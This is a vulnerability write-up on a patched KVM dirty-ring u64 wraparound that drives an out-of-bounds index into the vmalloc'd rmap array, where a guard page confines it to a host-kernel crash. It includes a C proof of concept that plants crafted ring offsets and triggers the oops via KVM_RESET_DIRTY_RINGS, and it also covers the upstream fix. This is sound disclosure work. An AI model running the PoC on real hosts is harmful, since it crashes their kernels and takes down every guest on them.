2026-05-16 - research
A KVM dirty-ring OOB that the allocator quietly defuses
A u64 wraparound in KVM's dirty-ring bounds check lets a userspace VMM drive an out-of-bounds index into the per-memslot reverse-map array. The rmap array lives in vmalloc address space, so the access lands inside the preceding guard page and faults before any value is loaded. The result is a deterministic host-kernel DoS. This writeup walks the bounds check, the wraparound, and why the vmalloc guard page closes the door cleanly enough that nothing downstream is reachable.
Verified on Linux v6.13.7 and v7.0.6. Target: virt/kvm/dirty_ring.c and arch/x86/kvm/mmu/mmu.c. Patched upstream on 2026-05-12 as commit 577a8d3bae05 ("KVM: Reject wrapped offset in kvm_reset_dirty_gfn()"), Cc: stable@vger.kernel.org. Fixes fb04a1eddb1a ("KVM: X86: Implement ring-based dirty memory tracking") — the original 5.10 introduction of the dirty ring.
Setup — the dirty ring is shared writable
KVM's dirty-ring tracking is the mechanism the host uses to tell the VMM which guest pages were dirtied since the last sync. Each ring entry is a struct kvm_dirty_gfn with three fields: flags, slot, and offset. The ring pages are mmap'd by the VMM with PROT_READ | PROT_WRITE. That is intentional, because the VMM acknowledges entries by writing flags. kvm_vcpu_mmap() at kvm_main.c:3982 does not strip VM_WRITE for dirty-ring pages, and nothing else polices which fields the VMM is allowed to scribble on.
The bug is that the kernel also reads the slot and offset fields back from the ring during reset — after the VMM has had a chance to overwrite them with values the kernel never wrote.
// virt/kvm/dirty_ring.c:125-126 -- kvm_dirty_ring_reset
next_slot = READ_ONCE(entry->slot); // attacker-controlled
next_offset = READ_ONCE(entry->offset); // attacker-controlled
READ_ONCE prevents the compiler from re-reading the field and racing with itself; it does not validate that the value matches what the kernel originally wrote. The trust boundary between host and VMM is being crossed in the wrong direction here.
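The gap between "read once" and "validated" can be sketched in plain C. This is a minimal userspace model, not kernel code: struct dirty_gfn mirrors the three fields named above (the field widths are my reading of the uapi header and should be treated as an assumption), and snapshot_entry() is a hypothetical helper name.

```c
#include <stdbool.h>
#include <stdint.h>

/* Userspace mirror of the three ring-entry fields (widths assumed). */
struct dirty_gfn {
    uint32_t flags;
    uint32_t slot;
    uint64_t offset;
};

/*
 * Hypothetical helper: copy the shared entry exactly once, then
 * range-check the private copy. Returns true if the offset is usable.
 */
static bool snapshot_entry(const volatile struct dirty_gfn *shared,
                           uint64_t npages, struct dirty_gfn *out)
{
    /* One load per field, the part READ_ONCE() takes care of. */
    out->flags  = shared->flags;
    out->slot   = shared->slot;
    out->offset = shared->offset;

    /* The part READ_ONCE() does not do: validate the snapshot. */
    return out->offset < npages;
}
```

The point of the sketch is the ordering: the single load stops the value from changing between check and use, but it is the explicit comparison on the copy that decides whether the value can be trusted.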
Root cause — the bounds check wraps in u64
Inside kvm_reset_dirty_gfn(), the kernel coalesces a 64-bit mask of nearby dirty offsets and validates the highest bit against the memslot:
// virt/kvm/dirty_ring.c:69 -- kvm_reset_dirty_gfn
if (!memslot || (offset + __fls(mask)) >= memslot->npages)
    return;
Both offset and __fls(mask) are u64. With offset = 0xFFFFFFFFFFFFFFC1 and __fls(mask) = 63, the mathematical sum is 0x10000000000000000, which truncates to 0 in 64 bits. Zero is less than npages, so the check passes. Only the sum wraps; offset itself is unchanged, and that original value, 0xFFFFFFFFFFFFFFC1, is what propagates downstream.
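The arithmetic is easy to reproduce outside the kernel. The following is a small model of the pre-patch comparison only; old_check_rejects() is a name made up for this sketch, and the memslot lookup is left out.

```c
#include <stdbool.h>
#include <stdint.h>

/*
 * Model of the pre-patch bounds check. Returns true when the check
 * would reject the request (i.e. the kernel would return early).
 */
static bool old_check_rejects(uint64_t offset, unsigned fls_mask,
                              uint64_t npages)
{
    /* uint64_t addition wraps modulo 2^64, exactly like u64 in the kernel. */
    return offset + fls_mask >= npages;
}
```

Under this model, old_check_rejects(0xFFFFFFFFFFFFFFC1, 63, 512) is false because the sum wraps to 0, while lowering the offset by one to 0xFFFFFFFFFFFFFFC0 gives a sum of 0xFFFFFFFFFFFFFFFF and the check rejects as intended.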
Reaching the corner case requires getting __fls(mask) high enough. That is done by the coalescing loop a few lines up:
// virt/kvm/dirty_ring.c:138-142
s64 delta = next_offset - cur_offset;
if (delta >= 0 && delta < BITS_PER_LONG) {
    mask |= 1ull << delta;
    continue;
}
Two crafted ring entries are enough. The first sets offset = 0xFFFFFFFFFFFFFFC1, the second sets offset = 0. As a signed 64-bit subtraction, 0 - 0xFFFFFFFFFFFFFFC1 = 63, which falls inside [0, BITS_PER_LONG). Bit 63 of mask gets set; __fls(mask) = 63; the wrap fires.
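A simplified model of the forward-coalescing step shows how the two entries produce the mask. It assumes that bit 0 of the mask stands for the first entry's own offset (consistent with the mask value in the oops further down) and ignores everything else the real loop does; coalesce_pair() and fls_index() are hypothetical helpers.

```c
#include <stdint.h>

/* Index of the highest set bit; mask must be non-zero. */
static unsigned fls_index(uint64_t mask)
{
    unsigned i = 0;
    while (mask >>= 1)
        i++;
    return i;
}

/*
 * Forward-coalescing model for two consecutive entries in the same slot.
 * Assumption: bit 0 represents first_offset itself.
 */
static uint64_t coalesce_pair(uint64_t first_offset, uint64_t second_offset)
{
    uint64_t mask = 1;
    /* Unsigned subtraction wraps, then is reinterpreted as signed. */
    int64_t delta = (int64_t)(second_offset - first_offset);

    if (delta >= 0 && delta < 64)
        mask |= 1ULL << delta;   /* second entry folded into the mask */
    return mask;
}
```

With first_offset = 0xFFFFFFFFFFFFFFC1 and second_offset = 0, delta is 63, so the result has bits 0 and 63 set and fls_index() of it is 63.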
Downstream — OOB into the rmap array
The wrapped offset reaches gfn_to_rmap() through the standard write-protect path:
// arch/x86/kvm/mmu/mmu.c:1010-1016 -- gfn_to_rmap
idx = gfn_to_index(gfn, slot->base_gfn, level);
return &slot->arch.rmap[level - PG_LEVEL_4K][idx];
// arch/x86/kvm/mmu/mmu.c:1213-1233 -- kvm_mmu_write_protect_pt_masked
while (mask) {
    rmap_head = gfn_to_rmap(slot->base_gfn + gfn_offset + __ffs(mask),
                            PG_LEVEL_4K, slot);
    rmap_write_protect(rmap_head, false);
    mask &= mask - 1;
}
With the wrap, idx evaluates to 0xFFFFFFFFFFFFFFC1, i.e. -63 when interpreted as a signed offset into the array. Since sizeof(struct kvm_rmap_head) = 8, that access lands exactly 8 * 63 = 504 bytes before the rmap allocation. More generally, varying the crafted offset together with the bit in mask that drives __fls yields a backward window of [-504, -8] bytes from rmap_array_base.
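To make the index arithmetic concrete, here is a sketch that walks a mask the same way the loop above does and records where each access would land relative to the array base. It models only the address computation for the 4K level with base_gfn cancelled out; rmap_displacements() is a hypothetical name and the 8-byte element size is taken from the text.

```c
#include <stddef.h>
#include <stdint.h>

#define RMAP_HEAD_SIZE 8ULL   /* sizeof(struct kvm_rmap_head), per the text */

/*
 * For each set bit in mask (lowest first), store the byte displacement
 * of the rmap entry from the array base. Returns the number of entries.
 */
static size_t rmap_displacements(uint64_t offset, uint64_t mask,
                                 int64_t out[64])
{
    size_t n = 0;

    while (mask) {
        unsigned bit = 0;
        while (!((mask >> bit) & 1))
            bit++;                          /* equivalent of __ffs(mask) */

        uint64_t idx = offset + bit;        /* wraps modulo 2^64 */
        /* Multiply unsigned, then reinterpret: avoids signed overflow. */
        out[n++] = (int64_t)(idx * RMAP_HEAD_SIZE);

        mask &= mask - 1;                   /* clear the lowest set bit */
    }
    return n;
}
```

For offset = 0xFFFFFFFFFFFFFFC1 and mask = 0x8000000000000001 this yields two displacements: -504 for bit 0, and 0 for bit 63, where the index has wrapped back to the first in-bounds element.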
rmap_write_protect() then reads rmap_head->val at the OOB address. If non-zero, it interprets the value as either a direct SPTE pointer or a pte_list_desc * and clears the writable bit. That is a kernel OOB read followed by a conditional kernel OOB write at an attacker-influenced address. On a slab allocation it would be the start of a familiar exploit chain.
The half-step — where the rmap actually lives
The previous draft of this writeup assumed the rmap array was a slab object, and reasoned about spraying kmalloc-2048 or kmalloc-4096 neighbours to control the value at rmap_head->val. That reasoning is wrong. Look at the allocator:
// arch/x86/kvm/x86.c:13483
slot->arch.rmap[i] = __vcalloc(lpages, sz, GFP_KERNEL_ACCOUNT);
__vcalloc() is a thin wrapper around __vmalloc_array_noprof() — always vmalloc, never slab. Every vmalloc area allocated through __get_vm_area_node() gets a guard page reserved immediately before it, unless VM_NO_GUARD is set. The rmap array does not set VM_NO_GUARD. The 4 KiB region directly preceding the rmap base is therefore an unmapped guard page, populated in the page tables only enough that the walk descends — the leaf PTE is zero.
The OOB window is [-504, -8] bytes relative to the rmap base. The guard page is 4096 bytes. The window fits inside the guard for every conceivable configuration of the allocator. The OOB load faults; the conditional write below it never executes.
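The size of the window can be checked by brute force. The sketch below enumerates every offset within 63 of 2^64 (the only offsets whose sum with a value below 64 can wrap), every possible __fls result, and every bit position the loop could visit, then reports the deepest backward displacement. The function name and the GUARD_PAGE_BYTES constant are illustrative; 4096 is the guard size stated above.

```c
#include <stdint.h>

#define GUARD_PAGE_BYTES 4096   /* guard page size stated in the text */

/*
 * Deepest (most negative) byte displacement from the rmap base that
 * passes the pre-patch check for a memslot of npages pages.
 */
static int64_t deepest_backward_bytes(uint64_t npages)
{
    int64_t deepest = 0;

    for (unsigned k = 1; k <= 63; k++) {
        uint64_t offset = 0 - (uint64_t)k;          /* 2^64 - k */

        for (unsigned top = 0; top <= 63; top++) {  /* top = __fls(mask) */
            if (offset + top >= npages)
                continue;                           /* check rejects */

            /* Any bit up to top may be set, so try them all. */
            for (unsigned bit = 0; bit <= top; bit++) {
                int64_t disp = (int64_t)((offset + bit) * 8ULL);
                if (disp < deepest)
                    deepest = disp;
            }
        }
    }
    return deepest;
}
```

Under these assumptions the result is -504 regardless of npages, comfortably inside GUARD_PAGE_BYTES.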
Runtime verification
Stage A of the PoC drives the kernel into the OOB load and produces the following oops on v7.0.6 with kvm.tdp_mmu=0 (so that kvm_memslots_have_rmaps() is true):
BUG: unable to handle page fault for address: ffffaa6580034e08
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
PGD 1000067 P4D 1000067 PUD 1146067 PMD 1147067 PTE 0
RIP: 0010:rmap_write_protect+0x6/0xf0
RAX: ffffffffffffffc1 RBX: 8000000000000001
RDI: ffffaa6580034e08 RDX: ffffaa6580035000
Every register tells you exactly what happened:
- RAX = 0xffffffffffffffc1: the wrapped offset (-63 as s64).
- RBX = 0x8000000000000001: the coalesced mask; __fls(mask) = 63.
- RDX = 0xffffaa6580035000: page-aligned, the rmap array base.
- RDI = 0xffffaa6580034e08: the OOB dereference target. 0x35000 - 0x34e08 = 0x1f8 = 504 bytes below the base, matching -63 * sizeof(struct kvm_rmap_head) exactly.
- Page-table walk: PGD/P4D/PUD/PMD all populated, PTE 0. The PMD descended into the region but the specific leaf is unmapped. That is the signature of a vmalloc guard page.
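The register values can be cross-checked mechanically. This sketch recomputes the faulting address from the base and index in the oops and tests whether it falls in the 4 KiB page immediately below the base; both helper names are hypothetical and the 8-byte element size comes from the text.

```c
#include <stdbool.h>
#include <stdint.h>

/* Address of rmap element idx, with 8-byte elements, wrapping modulo 2^64. */
static uint64_t oob_target(uint64_t rmap_base, uint64_t idx)
{
    return rmap_base + idx * 8ULL;
}

/* True if addr lies in the 4096-byte page directly below base. */
static bool in_preceding_page(uint64_t base, uint64_t addr)
{
    return addr >= base - 4096 && addr < base;
}
```

Feeding in RDX as the base and RAX as the index reproduces RDI, and the result sits inside the page directly below the page-aligned base.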
This is not a "got unlucky and faulted" outcome — it is structural. The guard page sits between the previous vmalloc allocation and this one by allocator invariant. Every configuration of memslot size, NUMA placement, and surrounding vmap state preserves it.
Reachability of the conditional write
The conditional clear-bit primitive in rmap_write_protect() requires rmap_head->val to load successfully and return a non-zero value that passes either the direct-SPTE or the pte_list_desc interpretation. The load itself faults before any value is consumed, so:
- No controlled value can be placed in the guard page — it is unmapped by construction.
- No spray or grooming primitive available from this bug puts anything inside the guard.
- Defeating the bound requires defeating vmalloc's guard invariant. This bug does not provide that primitive.
The OOB access faults before any value reaches downstream code. It is a host-kernel oops, full stop.
Proof of concept
Two ring entries with crafted offset values, a KVM_RESET_DIRTY_RINGS ioctl, and a host that oopses on the spot:
// 1. Create VM with dirty ring enabled
int kvm_fd = open("/dev/kvm", O_RDWR);
int vm_fd = ioctl(kvm_fd, KVM_CREATE_VM, 0);
// ... enable KVM_CAP_DIRTY_LOG_RING, create a memslot,
//     create a vCPU, run it long enough to push entries ...
// 2. Map the dirty ring read-write
struct kvm_dirty_gfn *ring = mmap(NULL, ring_size,
                                  PROT_READ | PROT_WRITE, MAP_SHARED,
                                  vcpu_fd, KVM_DIRTY_LOG_PAGE_OFFSET * PAGE_SIZE);
// 3. Mark all entries RESET, plant the wraparound pair
for (int i = 0; i < num_entries; i++) {
    ring[i].flags = KVM_DIRTY_GFN_F_RESET;
    if (i == target_idx) {
        ring[i].slot = 0;
        ring[i].offset = 0xFFFFFFFFFFFFFFC1ULL; // wraps the bound
    } else if (i == target_idx + 1) {
        ring[i].slot = 0;
        ring[i].offset = 0;                     // delta = 63
    }
}
// 4. Trigger reset -- OOB rmap access -> guard-page fault -> oops
ioctl(vm_fd, KVM_RESET_DIRTY_RINGS, 0);
Preconditions: /dev/kvm access (typically the kvm group), KVM_CAP_DIRTY_LOG_RING enabled, and a memslot with an allocated rmap. The last requires shadow paging (ept=0 / npt=0 or kvm.tdp_mmu=0), nested virtualization with shadow roots, or write-tracked slots. Not guest-triggerable — the ring is mapped only from the vCPU fd, which only the VMM holds.
Impact
| Factor | Value |
|---|---|
| Attack vector | Local (VMM process with /dev/kvm) |
| Complexity | Low (mmap + two ioctls) |
| Privileges required | /dev/kvm access, typically kvm group |
| User interaction | None |
| Scope | Unchanged — VMM userspace crashes the host kernel |
| Confidentiality | None (the OOB load faults before a value is returned; no readback channel) |
| Integrity | None (the OOB access faults before any value is loaded) |
| Availability | High (deterministic host kernel oops/panic) |
The upstream fix
The patch is two lines. It adds a standalone offset >= memslot->npages test ahead of the sum. That comparison contains no addition, so it cannot wrap, and short-circuit evaluation means the sum is only evaluated once offset < npages is known. memslot->npages is bounded well below U64_MAX, so with offset < npages and __fls(mask) < BITS_PER_LONG the sum cannot wrap around into the valid range.
--- a/virt/kvm/dirty_ring.c
+++ b/virt/kvm/dirty_ring.c
@@ -63,7 +63,8 @@ static void kvm_reset_dirty_gfn(...)
     memslot = id_to_memslot(__kvm_memslots(kvm, as_id), id);
-    if (!memslot || (offset + __fls(mask)) >= memslot->npages)
+    if (!memslot || offset >= memslot->npages ||
+        offset + __fls(mask) >= memslot->npages)
         return;
     KVM_MMU_LOCK(kvm);
Landed as 577a8d3bae05 on 2026-05-12, marked Fixes: fb04a1eddb1a and Cc: stable@vger.kernel.org for backport to every kernel that ever shipped KVM_CAP_DIRTY_LOG_RING (5.10+).
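The patched condition can be modelled in userspace to confirm that it closes the wrap. As before this covers only the comparison, not the memslot lookup; patched_check_rejects() and count_wrapping_accepts() are names invented for this sketch.

```c
#include <stdbool.h>
#include <stdint.h>

/* Model of the patched check. Returns true when the request is rejected. */
static bool patched_check_rejects(uint64_t offset, unsigned fls_mask,
                                  uint64_t npages)
{
    /* The first test has no addition; the second runs only if it fails. */
    return offset >= npages || offset + fls_mask >= npages;
}

/*
 * Count how many (offset, fls) pairs near 2^64 the patched check would
 * still accept. Expected to be zero for any realistic npages.
 */
static unsigned count_wrapping_accepts(uint64_t npages)
{
    unsigned accepted = 0;

    for (unsigned k = 1; k <= 63; k++)
        for (unsigned top = 0; top <= 63; top++)
            if (!patched_check_rejects(0 - (uint64_t)k, top, npages))
                accepted++;
    return accepted;
}
```

In this model the crafted pair from the PoC is rejected by the first comparison, while a legitimate request such as offset 448 with __fls(mask) = 63 in a 512-page slot still passes.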
The rmap array is __vcalloc'd, so the OOB walks into vmalloc's guard page instead of adjacent kernel memory — the allocator decision, not the bounds check, is what kept this bounded.
References
| Field | Value |
|---|---|
| Upstream commit | 577a8d3bae05 |
| Title | KVM: Reject wrapped offset in kvm_reset_dirty_gfn() |
| Fixes | fb04a1eddb1a ("KVM: X86: Implement ring-based dirty memory tracking") |
| Stable | Cc: stable@vger.kernel.org — backport to all kernels with KVM_CAP_DIRTY_LOG_RING (5.10+) |